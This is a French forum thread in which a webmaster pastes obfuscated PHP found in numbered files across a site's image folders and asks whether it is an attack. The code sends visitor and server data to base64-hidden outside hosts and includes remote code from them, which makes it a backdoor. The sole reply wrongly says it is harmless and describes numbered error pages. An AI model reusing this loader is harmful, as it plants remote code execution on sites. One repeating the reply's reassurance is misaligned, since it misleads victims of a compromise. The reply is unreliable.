Fichier php avec un nom en forme de nombre
vance
-
giheller Messages postés 1882 Date d'inscription Statut Membre Dernière intervention -
giheller Messages postés 1882 Date d'inscription Statut Membre Dernière intervention -
Bonjour,
je gére un site web et j'ai découvert il y a peu que des fichiers sous la forme "123651.php" était présent dans une grosse partie des repertoires où il y a des images, ce fichier contient ces codes php :
error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str);}
je voudrais bien savoir à quoi ca sert, en me disant que cela est une sorte d'attaque
je gére un site web et j'ai découvert il y a peu que des fichiers sous la forme "123651.php" était présent dans une grosse partie des repertoires où il y a des images, ce fichier contient ces codes php :
error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str);}
je voudrais bien savoir à quoi ca sert, en me disant que cela est une sorte d'attaque
A voir également:
- Fichier php avec un nom en forme de nombre
- Fichier bin - Guide
- Comment réduire la taille d'un fichier - Guide
- Comment ouvrir un fichier epub ? - Guide
- Mise en forme conditionnelle excel - Guide
- Fichier rar - Guide
1 réponse
Bonjour,
pourquoi une sorte d'attaque ?
un tel fichier peut servir par exemple à aiguiller l'affichage du code d'erreur comme vous dites en prenant le code.
soit :
j'ai une erreur 404, je vais afficher le contenu de 404.php
si j'ai 403 je vais afficher 403.php
ainsi sans faire de if, de case ou autres tests, en récupérant ce nombre j'affiche la bonne explication.
autre exemple,
imaginons un code matricule, cette technique permet de gérer des noms d'images qui prennet 001.jpg, 002.jpg ; chaque image ayant comme nom : n0_matricule.jpg.
facile alors d'afficher la tête qui va avec le bon matricule.
pourquoi une sorte d'attaque ?
un tel fichier peut servir par exemple à aiguiller l'affichage du code d'erreur comme vous dites en prenant le code.
soit :
j'ai une erreur 404, je vais afficher le contenu de 404.php
si j'ai 403 je vais afficher 403.php
ainsi sans faire de if, de case ou autres tests, en récupérant ce nombre j'affiche la bonne explication.
autre exemple,
imaginons un code matricule, cette technique permet de gérer des noms d'images qui prennet 001.jpg, 002.jpg ; chaque image ayant comme nom : n0_matricule.jpg.
facile alors d'afficher la tête qui va avec le bon matricule.